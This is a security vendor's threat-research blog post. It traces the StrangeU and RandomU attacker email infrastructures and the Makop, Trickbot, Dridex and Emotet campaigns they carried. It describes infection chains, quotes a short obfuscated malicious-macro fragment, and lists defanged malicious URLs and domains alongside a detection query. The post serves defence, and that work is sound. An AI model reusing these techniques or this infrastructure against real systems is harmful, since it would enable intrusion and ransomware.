Archive

Archive for the ‘phishing’ Category

What tracking an attacker email infrastructure tells us about persistent cybercriminal operations

February 1st, 2021 No comments

From March to December 2020, we tracked segments of a dynamically generated email infrastructure that attackers used to send more than a million emails per month, distributing at least seven distinct malware families in dozens of campaigns using a variety of phishing lures and tactics. These campaigns aimed to deploy malware on target networks across the world, with notable concentration in the United States, Australia, and the United Kingdom. Attackers targeted the wholesale distribution, financial services, and healthcare industries.

By tracing these campaigns, we uncovered a sprawling infrastructure that is robust enough to seem legitimate to many mail providers, while flexible enough to allow the dynamic generation of new domain names and remain evasive. Shared IP space, domain generation algorithm (DGA) patterns, subdomains, registrations metadata, and signals from the headers of malicious emails enabled us to validate our research through overlaps in campaigns where attackers utilized multiple segments of purchased, owned, or compromised infrastructure. Using the intelligence we gathered on this infrastructure, we were at times able to predict how a domain was going to be used even before campaigns began.

This email infrastructure and the malware campaigns that use it exemplify the increasing sophistication of cybercriminal operations, driven by attackers who are motivated to use malware infections for more damaging, potentially more lucrative attacks. In fact, more recent campaigns that utilized this infrastructure distributed malware families linked to follow-on human-operated attacks, including campaigns that deployed Dopplepaymer, Makop, Clop, and other ransomware families.

Our deep investigation into this infrastructure brings to light these important insights about persistent cybercriminal operations:

  • Tracking an email infrastructure surfaces patterns in attacker activity, bubbling up common elements in seemingly disparate campaigns
  • Among domains that attackers use for sending emails, distributing malware, or command-and-control, the email domains are the most likely to share basic registration similarities and more likely to use DGA
  • Malware services rely on proxy providers to make tracking and attribution difficult, but the proxies themselves can provide insights into upcoming campaigns and improve our ability to proactively protect against them
  • Gaining intelligence on email infrastructures enables us to build or improve proactive and comprehensive protections like those provided by Microsoft Defender for Office 365 to defend against some of the world’s most active malware campaigns

While there is existing in-depth research into some of these specific campaigns, in this blog we’ll share more findings and details on how email distribution infrastructures drive some of the most prevalent malware operations today. Our goal is to provide important intelligence that hosting providers, registrars, ISPs, and email protection services can use and build on to protect customers from the threats of today and the future. We’ll also share insights and context to empower security researchers and customers to take full advantage of solutions like Microsoft Defender for Office 365 to perform deep investigation and hunting in their environment and make their organizations resilient against attacks.

The role of for-sale infrastructure services in the threat ecosystem

We spotted the first segment of the infrastructure in March, when multiple domains were registered using distinct naming patterns, including the heavy use of the word “strange”, inspiring the name StrangeU. In April, a second segment of the infrastructure, one that used domain generation algorithm (DGA), began registration as well. We call this segment RandomU.

The emergence of this infrastructure in March dovetailed with the disruption of the Necurs botnet that resulted in the reduction of service. Before being disrupted, Necurs was one of the world’s largest botnets and was used by prolific malware campaign operators such as those behind Dridex. For-sale services like Necurs enable attackers to invest in malware production while leasing the delivery components of their activities to further obfuscate their behavior. The StrangeU and RandomU infrastructure appear to fill in the service gap that the Necurs disruption created, proving that attackers are highly motivated to quickly adapt to temporary interruptions to their operations.

Graph showing timeline of the Necurs takedown and the staging and operation of StrangeU and RandomU

Figure 1. Timeline of staging and utilization of the email infrastructure

At first, the new email infrastructure was used infrequently in campaigns that distributed highly commodity malware like Mondfoxia and Makop. Soon, however, it attracted the attention of Dridex and Trickbot operators, who began using the infrastructure for portions of their campaigns, sometimes entirely and sometimes mixed with other compromised infrastructure or email providers.

Analyzing these mail clusters provides insight into how human the tangled web of modular attacker infrastructure remains. From unifying key traits in registration and behavior to the simple and effective techniques that the wide variety of malware uses, attackers’ goals in this diversification point toward combatting automated analysis. However, these same shared characteristics and methods translate to insights that inform resilient protections that defend customers against these attacks.

Domain registration and email infrastructure staging

On March 7, 2020, attackers began registering a series of domains with Namecheap using sets of stolen email addresses, largely from free email services like mail.com, mail.ru, list.ru, and others. These domains all had similar characteristics that could be linked back to various similarities in registration. Almost all of the registered domains contained the word “strange” and were under the .us TLD, hence the name StrangeU. The use of .us TLD prevented domain or WHOIS privacy services—often used to obfuscate domain ownership and provenance—which are prohibited for this TLD.

To circumvent tracking and detection of these domains, attackers used false registration metadata. However, there was heavy crossover in the fake names and email addresses, allowing us to find additional domain names, some of which could be tied together using other keywords as shown in the list below, and fingerprint the domain generation mechanism.

The StrangeU domains were registered in early March 2020 and operated in continuous small bursts until April, when they were used for a large ransomware campaign. Following that, a new campaign occurred fairly regularly every few weeks. Registration of new domains continued throughout the year, and in September, the StrangeU infrastructure was used in conjunction with a similar infrastructure to deliver Dridex, after which these domains were used less frequently.

This second mailing segment, RandomU, employed a different DGA mechanism but still utilized Namecheap and showed a more consistent through line of registration metadata than its StrangeU counterpart. This infrastructure, which surfaced in April, was used infrequently through the Spring, with a surge in May and July. After the Dridex campaign in September in which it was used along with StrangeU, it has been used in two large Dridex campaigns every month.

Table listing observed patterns in StrangeU and RandomU infrastructures

Figure 2. Common patterns in domains belonging to the email infrastructure

The StrangeU and RandomU segments of domains paint a picture of supplementing modular mailing services that allowed attackers to launch region-specific and enterprise-targeting attacks at scale, delivering over six million emails. The two segments contained a standard barrage of mailing subdomains, with over 60 unique subdomains referencing email across clusters, consistent with each other, with each domain having four to five subdomains. The following is a sample of malware campaigns, some of which we discuss in detail in succeeding sections, that we observed this infrastructure was used for:

  • Korean spear-phishing campaigns that delivered Makop ransomware in April and June
  • Emergency alert notifications that distributed Mondfoxia in April
  • Black Lives Matter lure that delivered Trickbot in June
  • Dridex campaign delivered through StrangeU and other infra from June to July
  • Dofoil (SmokeLoader) campaign in August
  • Emotet and Dridex activities in September, October, and November

Timeline of campaigns using the StrangeU and RandomU infrastructures

Figure 3. Timeline of campaigns that used StrangeU and RandomU domains

Korean spear-phishing delivers Makop ransomware (April and June 2020)

In early April, StrangeU was used to deliver the Makop ransomware. The emails were sent to organizations that had major business operations in Korea and used names of Korean companies as display names. Signals from Microsoft Defender for Office 365 indicated that these campaigns ran in short bursts.

The emails had .zip attachments containing executables with file names that resembled resumes from job seekers. Once a user opened the attachments, the executables delivered Makop, a ransomware-as-a-service (RaaS) payload that targeted devices and backups.

Upon infection, the malware quickly used the WMI command-line (WMIC) utility and deleted shadow copies. It then used the BCEdit tool and altered the boot configuration to ignore future failures and prevent restoration before encrypting all files and renaming them with .makop extensions.

The second time we observed the campaign almost two months later, in early June, the attackers used a Makop ransomware variant with many modified elements, including added persistence via scripts in the Startup folder before triggering a reboot.

Nearly identical attempts to deliver Makop using resume-based lures were covered by Korean security media during the entire year, using popular mail services through legitimate vendors like Naver and Hanmail. This could indicate that during short bursts the Makop operators were unable to launch their campaigns through legitimate services and had to move to alternate infrastructures like StrangeU instead.

Black Lives Matter lure delivers Trickbot (June 2020)

One campaign associated with the StrangeU infrastructure gained notoriety in mid-June for its lure as well as for delivering the notorious info-stealing malware Trickbot. This campaign circulated emails with malicious Word documents claiming to seek anonymous input on the Black Lives Matter movement.

An initial version of this campaign was observed on June 10 sending emails from a separate, unique attacker-owned mailing infrastructure using .monster domains. However, in the next iteration almost two weeks later, the campaign delivered emails from various domains specifically created with the Black Lives Matter signage, interspersed with StrangeU domains:

  • b-lives-matter[.]site
  • blivesm[.]space
  • blivesmatter[.]site
  • lives-matter-b[.]xyz
  • whoslivesmatter[.]site
  • lives-m-b[.]xyz
  • ereceivedsstrangesecureworld[.]us
  • b-l-m[.]site

Both campaigns carried the same Trickbot payload, operated for two days, and used identical post-execution commands and callouts to compromised WordPress sites.

Once a user opened the document attachment and enabled the malicious macro, Word launched cmd.exe with the command “/c pause” to evade security tools that monitored for successive launches of multiple processes. It then launched commands that deleted proxy settings in preparation for connecting to multiple C2 IP addresses.

Screenshot of malicious document

Figure 4. Screenshot of the malicious document used to deliver Trickbot

The commands also launched rundll32.exe, a native binary commonly used as a living-off-the-land binary, to load a malicious file in memory. The commandeered rundll32.exe also proceeded to perform other tasks using other living-off-the-land binaries, including wermgr.exe and svchost.exe.

In turn, the hijacked wermgr.exe process dropped a file with a .dog extension that appeared to be the Trickbot payload. The same instance of wermgr.exe then appeared to inject code into svchost.exe and scanned for open SMB ports on other devices. The commandeered svchost.exe used WMI to open connections to additional devices on the network, while continuing to collect data from the initial infected device. It also opened multiple browsers on localhost connections to capture browser history and other information via esentutl.exe and grabber_temp.edb, both of which are often used by the Trickbot malware family.

This campaign overwhelmingly targeted corporate accounts in the United States and Canada and avoided individual accounts. Despite heavy media coverage, this campaign was relatively small, reflecting a common behavior among cybercrime groups, which often run multiple, dynamic low-volume campaigns designed to evade resilient detection.

Dridex campaigns big and small (June to July 2020 and beyond)

From late June through July, Dridex operators ran numerous campaigns that distributed Excel documents with malicious macros to infect devices. These operators first delivered emails through the StrangeU infrastructure only, but they quickly started to use compromised email accounts of legitimate organizations as well, preventing defenders from easily blocking deliveries. Despite this, emails from either StrangeU or the compromised accounts had overlapping attributes. For example, many of the emails used the same Reply To addresses that were sourced from compromised individual accounts and not consistent with the sender addresses.

During the bulk of this run, Excel files were attached directly in the email in order to eventually pull the Dridex payload from .xyz domains such as those below. The attackers changed the delivery domains every few days and connected to IP-based C2s on familiar ports like 4664, 3889, 691, and 8443:

  • yumicha[.]xyz
  • rocesi[.]xyz
  • secretpath[.]xyz
  • guruofbullet[.]xyz
  • Greyzone[.]xyz

When opened, the Excel document installed one of a series of custom Dridex executables downloaded from the attacker C2 sites. Like most variants in this malware family, the custom Dridex executables incorporated code loops, time delays, and environment detection mechanisms that evaded numerous public and enterprise sandboxes.

Dridex is known for its capability to perform credential theft and establish connectivity to attacker infrastructure. In this instance, the same Dridex payload was circulated daily using varying lures, often repeatedly to the same organizations to ensure execution on target networks.

During the longer and more stable Excel Dridex campaigns in June and July, a Dridex variant was also distributed in much smaller quantities utilizing Word documents over a one-day period, perhaps testing new evasion techniques. These Word documents, while still delivering Dridex, improved existing obfuscation methods using a unique combination of VBA stomping and replacing macros and function calls with arbitrary text. In a few samples of these documents, we found text from Shakespearean prose.

</ms:script>   
var farewell_and_moon = ["m","a","e","r","t","s",".","b","d","o","d","a"].reverse().join("")   
a_painted_word(120888)   
function as_thy_face(takes_from_hamlet)   
{return new ActiveXObject(takes_from_hamlet)}   
</ms:script>

While Microsoft researchers didn’t observe this portion of the campaign moving into the human-operated phase—targets did not open the attachment—this campaign was likely to introduce tools like PowerShell Empire or Cobalt Strike to steal credentials, move laterally, and deploy ransomware.

Emotet, Dridex, and the RandomU infrastructure (September and beyond)

Despite an errant handful of deliveries distributing Dofoil (also known as SmokeLoader) and other malware, the vast majority of the remaining deliveries through StrangeU have been Dridex campaigns that reoccured every few weeks for a handful of days at a time. These campaigns started on September 7, when RandomU and StrangeU were notably used in a single campaign, after which StrangeU began to see less utilization.

These Dridex campaigns utilized an Emotet loader and initial infrastructure for hosting, allowing the attackers to conduct a highly modular email campaign that delivered multiple distinct links to compromised domains. These domains employed heavy sandbox evasion and are connected by a series of PHP patterns ending in a small subset of options: zxlbw.phpyymclv.phpzpsxxla.php, or app.php. As the campaigns continued, the PHP was dynamically generated, adding other variants, including vary.php, invoice.php, share.php, and many others. Some examples are below.

  • hxxps://molinolafama[.]com[.]mx/app[.]php
  • hxxps://meetingmins[.]com/app[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zxlbw[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zpsxxla[.]php
  • hxxps://idklearningcentre[.]com[.]ng/yymclv[.]php
  • hxxps://hsa[.]ht/yymclv[.]php
  • hxxps://hsa[.]ht/zpsxxla[.]php
  • hxxps://hsa[.]ht/zxlbw[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://track[.]topad[.]co[.]uk/zpsxxla[.]php
  • hxxps://seoemail[.]com[.]au/zxlbw[.]php
  • hxxps://bred[.]fr-authentification-source-no[.]inaslimitada[.]com/zpsxxla[.]php
  • hxxp://www[.]gbrecords[.]london/zpsxxla[.]php
  • hxxp://autoblogsite[.]com/zpsxxla[.]php
  • hxxps://thecrossfithandbook[.]com/zpsxxla[.]php
  • hxxps://mail[.]168vitheyrealestate[.]com/zpsxxla[.]php

In this campaign, sandboxes were frequently redirected to unrelated sites like chemical manufacturers or medical suppliers, while users received an Emotet downloader within a Word document, which once again used macros to facilitate malicious activities.

Screenshot of malicious document

Figure 5. Screenshot of the malicious document used to deliver Dridex

The malicious macro utilized WMI to run a series of standard PowerShell commands. First, it downloaded the executable payload itself by contacting a series of C2 domains associated with Emotet campaigns since July. Afterward, additional encoded PowerShell commands were used in a similar fashion to download a .zip file that contained a Dridex DLL. Additional commands also reached out to a variety of Emotet infrastructure hosted on compromised WordPress administrative pages, even after the Dridex payload has already been downloaded. Dridex then modified RUN keys to automatically start the Dridex executable, which was renamed to riched20.exe on subsequent logons.

We also observed simultaneous connections to associated Dridex and Emotet infrastructure. These connections were largely unencrypted and occurred over a variety of ports and services, including ports 4664 and 9443. At this point the malware had firm presence on the machine, enabling attackers to perform human-operated activity at a later date.

In the past, reports have confirmed Dridex being delivered via leased Emotet infrastructure. There have also been many IP and payload-based associations. This research adds to that body of work and confirms additional associations via namespace, as well as correlation of email lure, metadata, and sender. This iteration of campaign repeated through October to December largely unchanged with nearly identical mails.

Defending organizations against malware campaigns

As attacks continue to grow in modularity, the tactics that attackers use to deliver phishing email, gain initial access on systems, and move laterally will continuously become more varied. This research shows that despite these disparities and the increased resiliency attackers have built, the core tactics and tools that they use are still limited in scope, relying repeatedly on familiar malicious macros, lures, and sending tactics.

Sweeping research into massive attacker infrastructures, as well as our real-time monitoring of malware campaigns and attacker activity, directly inform Microsoft security solutions, allowing us to build or improve protections that block malware campaigns and other email threats, both current and future, as well as provide enterprises with the tools for investigating and responding to email campaigns in real-time.

Microsoft delivers these capabilities through Microsoft Defender for Office 365. Features likes Safe attachments and Safe links ensure real-time, dynamic protection against email campaigns no matter the lure or evasion tactic. These features use a combination of detonation, automated analysis, and machine learning to detect new and unknown threats. Meanwhile, the Campaign view shows the complete picture of email campaigns as they happen, including timelines, sending patterns, impact to the organization, and details like IP addresses, senders, and URLs. These insights into email threats empower security operations teams to respond to attacks, perform additional hunting, and fix configuration issues.

Armed with an advanced solution like Microsoft Defender for Office 365 and the rest of technologies in the broader Microsoft 365 Defender solution, enterprises can further increase resilience against threats by following these recommendations:

  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email, and reporting of reconnaissance attempts and other suspicious activity.
  • Configure Office 365 email filtering settings to ensure blocking of phishing & spoofed emails, spam, and emails with malware. Set Office 365 to recheck links on click and delete sent mail to benefit from newly acquired threat intelligence.
  • Disallow macros or allow only macros from trusted locations. See the latest security baselines for Office and Office 365.
  • Turn on AMSI for Office VBA.
  • Check perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Turn on network protection to block connections to malicious domains and IP addresses. Such restrictions help inhibit malware downloads and command-and-control activity.

Turning on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications, also significantly improves defenses. The following rules are especially useful in blocking the techniques observed in campaigns using the StrangeU and RandomU infrastructure:

Microsoft 365 customers can also use the advanced hunting capabilities in Microsoft 365 Defender, which integrates signals from Microsoft Defender for Office 365 and other solutions, to locate activities and artifacts related to the infrastructure and campaigns discussed in this blog. These queries can be used with advanced hunting in Microsoft 365 security center, but the same regex pattern can be used on other security tools to identify or block emails.

This query searches for emails sent from StrangeUemail addresses. Run query

EmailEvents   
| where SenderMailFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"   
or SenderFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

 

 

Indicators of compromise

StrangeU domains

esendsstrangeasia[.]us sendsstrangesecuretoday[.]us emailboostgedigital[.]us
emailboostgelife[.]us emailboostgelifes[.]us emailboostgesecureasia[.]us
eontaysstrangeasia[.]us eontaysstrangenetwork[.]us eontaysstrangerocks[.]us
eontaysstrangesecureasia[.]us epropivedsstrangevip[.]us ereplyggstangeasia[.]us
ereplyggstangedigital[.]us ereplyggstangeereplys[.]us ereplyggstangelifes[.]us
ereplyggstangenetwork[.]us ereplyggstangesecureasia[.]us frostsstrangeworld[.]us
servicceivedsstrangevip[.]us servicplysstrangeasia[.]us servicplysstrangedigital[.]us
servicplysstrangelife[.]us servicplysstrangelifes[.]us servicplysstrangenetwork[.]us
ereceivedsstrangesecureworld[.]us ereceivedsstrangetoday[.]us ereceivedsstrangeus[.]us
esendsstrangesecurelife[.]us sendsstrangesecureesendss[.]us ereplysstrangesecureasia[.]us
ereplysstrangesecurenetwork[.]us receivedsstrangesecurelife[.]us ereplysstrangeworld[.]us
reauestysstrangesecurelive[.]us ereceivedsstrangeworld[.]us esendsstrangesecurerocks[.]us
reauestysstrangesecuredigital[.]us reauestysstrangesecurenetwork[.]us reauestysstrangesecurevip[.]us
replysstrangesecurelife[.]us ereauestysstrangesecurerocks[.]us ereceivedsstrangeasia[.]us
ereceivedsstrangedigital[.]us ereceivedsstrangeereceiveds[.]us ereceivedsstrangelife[.]us
ereceivedsstrangelifes[.]us ereceivedsstrangenetwork[.]us ereceivedsstrangerocks[.]us
ereceivedsstrangesecureasia[.]us receivedsstrangeworld[.]us replysstrangedigital[.]us
invdeliverynows[.]us esendsstrangesecuredigital[.]us esendsstrangesecureworld[.]us
sendsstrangesecurenetwork[.]us ereceivedsstrangevip[.]us replysstrangerocs[.]us
replysstrangesecurelive[.]us invpaymentnoweros[.]us invpaymentnowes[.]us
replysstrangeracs[.]us reauestysstrangesecurebest[.]us receivedsstrangesecurebest[.]us
reauestysstrangesecurelife[.]us ereplysstrangevip[.]us reauestysstrangesecuretoday[.]us
ereplysstrangesecureus[.]us ereplysstrangetoday[.]us ereceivedsstrangesecuredigital[.]us
ereceivedsstrangesecureereceiveds[.]us ereceivedsstrangesecurelife[.]us ereceivedsstrangesecurenetwork[.]us
ereceivedsstrangesecurerocks[.]us ereceivedsstrangesecureus[.]us ereceivedsstrangesecurevip[.]us
sendsstrangesecurebest[.]us sendsstrangesecuredigital[.]us sendsstrangesecurelive[.]us
sendsstrangesecureworld[.]us esendsstrangedigital[.]us esendsstrangeesends[.]us
esendsstrangelifes[.]us esendsstrangerocks[.]us esendsstrangesecureasia[.]us
esendsstrangesecureesends[.]us esendsstrangesecurenetwork[.]us esendsstrangesecureus[.]us
esendsstrangesecurevip[.]us esendsstrangevip[.]us ereauestysstrangesecureasia[.]us
ereplysstrangeasia[.]us ereplysstrangedigital[.]us ereplysstrangeereplys[.]us
ereplysstrangelife[.]us ereplysstrangelifes[.]us ereplysstrangenetwork[.]us
ereplysstrangerocks[.]us ereplysstrangesecuredigital[.]us ereplysstrangesecureereplys[.]us
ereplysstrangesecurelife[.]us ereplysstrangesecurerocks[.]us ereplysstrangesecurevip[.]us
ereplysstrangesecureworld[.]us ereplysstrangeus[.]us reauestysstrangesecureclub[.]us
reauestysstrangesecureereauestyss[.]us reauestysstrangesecureworld[.]us receivedsstrangesecureclub[.]us
receivedsstrangesecuredigital[.]us receivedsstrangesecureereceivedss[.]us receivedsstrangesecurelive[.]us
receivedsstrangesecurenetwork[.]us receivedsstrangesecuretoday[.]us receivedsstrangesecurevip[.]us
receivedsstrangesecureworld[.]us replysstrangesecurebest[.]us replysstrangesecureclub[.]us
replysstrangesecuredigital[.]us replysstrangesecureereplyss[.]us replysstrangesecurenetwork[.]us
replysstrangesecuretoday[.]us replysstrangesecurevip[.]us replysstrangesecureworld[.]us
sendsstrangesecurevip[.]us esendsstrangelife[.]us esendsstrangenetwork[.]us
esendsstrangetoday[.]us esendsstrangeus[.]us esendsstrangeworld[.]us
sendsstrangesecureclub[.]us sendsstrangesecurelife[.]us plysstrangelifes[.]us
intulifeinoi[.]us replysstrangerocks[.]us invpaymentnowe[.]us
replysstrangelifes[.]us replysstrangenetwork[.]us invdeliverynowr[.]us
ereceivedggstangevip[.]us ereplyggstangerocks[.]us servicceivedsstrangeworld[.]us
servicplysstrangesecureasia[.]us servicplysstrangeservicplys[.]us emailboostgeasia[.]us
emailboostgeereplys[.]us emailboostgenetwork[.]us emailboostgerocks[.]us
eontaysstrangedigital[.]us eontaysstrangeeontays[.]us eontaysstrangelife[.]us
eontaysstrangelifes[.]us epropivedsstrangeworld[.]us ereceivedggstangeworld[.]us
ereplyggstangelife[.]us frostsstrangevip[.]us servicplysstrangerocks[.]us
invdeliverynow[.]us invpaymentnowlife[.]us invdeliverynowes[.]us
invpaymentnowwork[.]us replysstrangedigitals[.]us replysstrangelife[.]us
replysstrangelifee[.]us replystrangeracs[.]us

RandomU domains

cnewyllansf[.]us kibintiwl[.]us planetezs[.]us sakgeldvi[.]us
rdoowvaki[.]us kabelrandjc[.]us wembaafag[.]us postigleip[.]us
jujubugh[.]us honidefic[.]us utietang[.]us scardullowv[.]us
vorlassebv[.]us jatexono[.]us vlevaiph[.]us bridgetissimema[.]us
schildernjc[.]us francadagf[.]us strgatibp[.]us jelenskomna[.]us
prependerac[.]us oktagonisa[.]us enjaularszr[.]us opteahzf[.]us
skaplyndiej[.]us dirnaichly[.]us kiesmanvs[.]us gooitounl[.]us
izvoznojai[.]us kuphindanv[.]us pluienscz[.]us huyumajr[.]us
arrutisdo[.]us loftinumkx[.]us ffermwyrzf[.]us hectorfranez[.]us
munzoneia[.]us savichicknc[.]us nadurogak[.]us raceaddicteg[.]us
mpixiris[.]us lestenas[.]us collahahhaged[.]us enayilebl[.]us
hotteswc[.]us kupakiliayw[.]us deroutarek[.]us pomagatia[.]us
mizbebzpe[.]us firebrandig[.]us univerzamjw[.]us amigosenrutavt[.]us
kafrdaaia[.]us cimadalfj[.]us ubrzanihaa[.]us yamashumiks[.]us
jakartayd[.]us cobiauql[.]us idiofontg[.]us hoargettattzt[.]us
encilips[.]us dafanapydutsb[.]us intereqr[.]us chestecotry[.]us
diegdoceqy[.]us ffwdenaiszh[.]us sterinaba[.]us wamwitaoko[.]us
peishenthe[.]us hegenheimlr[.]us educarepn[.]us ayajuaqo[.]us
imkingdanuj[.]us dypeplayentqt[.]us traktorkaqk[.]us prilipexr[.]us
collazzird[.]us sentaosez[.]us vangnetxh[.]us valdreska[.]us
mxcujatr[.]us angelqtbw[.]us bescromeobsemyb[.]us hoogametas[.]us
mlitavitiwj[.]us pasgemaakhc[.]us facelijaxg[.]us harukihotarugf[.]us
pasosaga[.]us mashimariokt[.]us vodoclundqs[.]us trofealnytw[.]us
cowboyie[.]us dragovanmm[.]us jonuzpura[.]us cahurisms[.]us
leetzetli[.]us jonrucunopz[.]us flaaksik[.]us wizjadne[.]us
zatsopanogn[.]us roblanzq[.]us barbwirelx[.]us givolettoan[.]us
gyfarosmt[.]us zastirkjx[.]us sappianoyv[.]us noneedfordayvnb[.]us
andreguidiao[.]us concubinsel[.]us meljitebj[.]us alcalizezsc[.]us
springenmw[.]us kongovkamev[.]us starlitent[.]us cassineraqy[.]us
ariankacf[.]us plachezxr[.]us abulpasastq[.]us scraithehk[.]us
wintertimero[.]us abbylukis[.]us lumcrizal[.]us trokrilenyr[.]us
skybdragonqx[.]us pojahuez[.]us rambalegiec[.]us relucrarebk[.]us
vupardoumeip[.]us punicdxak[.]us vaninabaranaogw[.]us yesitsmeagainle[.]us
upcominge[.]us arwresaub[.]us zensimup[.]us joelstonem[.]us
ciflaratzz[.]us adespartc[.]us maaltijdr[.]us acmindiaj[.]us
mempetebyj[.]us itorandat[.]us galenicire[.]us cheldisalk[.]us
zooramawpreahkt[.]us sijamskojoc[.]us fliefedomrr[.]us ascenitianyrg[.]us
tebejavaaq[.]us finnerssshu[.]us slimshortyub[.]us angstigft[.]us
avedaviya[.]us aasthakathykh[.]us nesklonixt[.]us drywelyza[.]us
paginomxd[.]us gathesitehalazw[.]us antinodele[.]us ferestat[.]us
tianaoeuat[.]us pogilasyg[.]us mjawxxik[.]us bertolinnj[.]us
auswalzenna[.]us mmmikeyvb[.]us megafonasgc[.]us litnanjv[.]us
boockmasi[.]us andreillazf[.]us vampirupn[.]us lionarivv[.]us
ihmbklkdk[.]us okergeeliw[.]us forthabezb[.]us trocetasss[.]us
kavamennci[.]us mipancepezc[.]us infuuslx[.]us dvodomnogeg[.]us
zensingergy[.]us eixirienhj[.]us trapunted[.]us greatfutbolot[.]us
porajskigx[.]us mumbleiwa[.]us cilindrarqe[.]us uylateidr[.]us
sdsandrahuin[.]us trapeesr[.]us trauttbobw[.]us bostiwro[.]us
niqiniswen[.]us ditionith[.]us folseine[.]us zamoreki[.]us
sonornogae[.]us xlsadlxg[.]us varerizu[.]us seekabelv[.]us
nisabooz[.]us pohvalamt[.]us inassyndr[.]us ivenyand[.]us
karbonsavz[.]us svunturc[.]us babyrosep[.]us aardigerf[.]us
fedrelandx[.]us degaeriah[.]us detidiel[.]us acuendoj[.]us
peludine[.]us impermatav[.]us datsailis[.]us melenceid[.]us
beshinon[.]us dinangnc[.]us fowiniler[.]us laibstadtws[.]us
bischerohc[.]us muctimpubwz[.]us jusidalikan[.]us peerbalkw[.]us
robesikaton[.]us thabywnderlc[.]us osoremep[.]us krlperuoe[.]us
ntarodide[.]us bideoskin[.]us senagena[.]us kelyldori[.]us
kawtriatthu[.]us rbreriaf[.]us enaqwilo[.]us monesine[.]us
onwinaka[.]us yonhydro[.]us siostailpg[.]us bannasba[.]us
milosnicacz[.]us tunenida[.]us sargasseu[.]us malayabc[.]us
prokszacd[.]us premarketcl[.]us zedyahai[.]us xinarmol[.]us
minttaid[.]us pufuletzpb[.]us nekbrekerdv[.]us ppugsasiw[.]us
katarkamgm[.]us kyraidaci[.]us falhiblaqv[.]us lisusant[.]us
mameriar[.]us quslinie[.]us nirdorver[.]us trocairasec[.]us
pochwikbz[.]us ingykhat[.]us okrzynjf[.]us razsutegayl[.]us
dimbachzx[.]us buchingmc[.]us iessemda[.]us fatarelliqi[.]us
efetivumd[.]us vdevicioik[.]us klumppwha[.]us stefiensi[.]us
donetzbx[.]us wetafteto[.]us denementnd[.]us cyllvysr[.]us
viweewmokmt[.]us destescutyi[.]us craulisrt[.]us maggiebagglesxt[.]us
yawapasaqi[.]us spimilatads[.]us paseadoryy[.]us apageyantak[.]us
magicofaloeaj[.]us prefatoryhe[.]us statvaiq[.]us piketuojaqk[.]us
mushipotatobt[.]us suergonugoy[.]us gummiskoxt[.]us torunikc[.]us
adoleishswn[.]us rovljanie[.]us ivicukfa[.]us vajarelliwe[.]us
burksuit[.]us adoraableio[.]us bassettsz[.]us chevyguyxq[.]us
lunamaosa[.]us telemovelmi[.]us pimptazticui[.]us posteryeiq[.]us
miriamloiso[.]us salahlekajl[.]us inveshilifj[.]us alquicelbi[.]us
hitagjafirt[.]us ohatranqm[.]us scosebexgofxu[.]us vivalasuzyygb[.]us
lugleeghp[.]us alicuppippn[.]us wedutuanceseefv[.]us abnodobemmn[.]us
zajdilxtes[.]us inhaltsqxw[.]us rejtacdat[.]us contunaag[.]us
pitajucmas[.]us delopezmc[.]us donjimafx[.]us iheartcoxlc[.]us
rommelcrxgi[.]us jorguetky[.]us jadesellvb[.]us fintercentrosfs[.]us
ralbarix[.]us kynnirinnty[.]us bibulbio[.]us aspazjagh[.]us
gleboqrat[.]us tensinory[.]us usitniterx[.]us zaretkyui[.]us
hentugustqy[.]us surigatoszuk[.]us nitoeranybr[.]us spitzkopuo[.]us
podkarpatruszz[.]us milfincasqo[.]us datatsbjew[.]us changotme[.]us
losbindebt[.]us ninjachuckvb[.]us desfadavacp[.]us potkazatiun[.]us
sernakct[.]us razmersat[.]us purtinaah[.]us ampiovfa[.]us
durstinyskv[.]us kreukenct[.]us shinanyavc[.]us kolaryta[.]us
yangtsekk[.]us voyagedeviema[.]us elblogdelld[.]us utiligijc[.]us
peaplesokqo[.]us jenggoteq[.]us dogliairler[.]us kandizifb[.]us
flunkmasteraz[.]us clewpossejj[.]us hymgaledaja[.]us gmckayar[.]us
fagordul[.]us pnendickhs[.]us arrogede[.]us stilenii[.]us
cafelireao[.]us poishiuuz[.]us nonfunccoupyo[.]us madrigalbta[.]us
tarad[.]us sarahcp[.]us wickyjr[.]us ghadrn[.]us
sirvond[.]us qumarta[.]us verow[.]us mondeki[.]us
lirana[.]us niarvi[.]us belena[.]us qucono[.]us
ulianag[.]us lenut[.]us shivave[.]us jendone[.]us
seddauf[.]us jarare[.]us uchar[.]us ealesa[.]us
wyoso[.]us marnde[.]us thiath[.]us aulax[.]us
bobelil[.]us jestem[.]us detala[.]us phieyen[.]us
annazo[.]us dilen[.]us jelan[.]us ipedana[.]us
keulsph[.]us ztereqm[.]us rinitan[.]us natab[.]us
haritol[.]us ricould[.]us lldra[.]us miniacs[.]us
zahrajr[.]us cayav[.]us pheduk[.]us qugagad[.]us
dehist[.]us letama[.]us mencyat[.]us vindae[.]us
uranc[.]us handil[.]us galezay[.]us bamerna[.]us
yllyn[.]us ckavl[.]us ilalie[.]us daellee[.]us
cuparoc[.]us zelone[.]us burnile[.]us uloryrt[.]us
shexo[.]us phalbe[.]us hanolen[.]us lorria[.]us
beten[.]us xuserye[.]us iclelan[.]us cwokas[.]us
vesic[.]us ontolan[.]us wajdana[.]us telama[.]us
missani[.]us usinaye[.]us ertanom[.]us kericex[.]us
denaga[.]us tyderq[.]us seliza[.]us kinnco[.]us
qurtey[.]us arzenitlu[.]us vellpoildzu[.]us keityod[.]us
ltangerineldf[.]us lizergidft[.]us serrucheah[.]us lolricelolad[.]us
expiantaszg[.]us hljqfyky[.]us abarrosch[.]us lepestrinynr[.]us
elektroduendevq[.]us waggonbauwh[.]us chaquetzgg[.]us revizijiqa[.]us
ziggyiqta[.]us rokenounkaf[.]us lottemanvl[.]us corsetatsvp[.]us
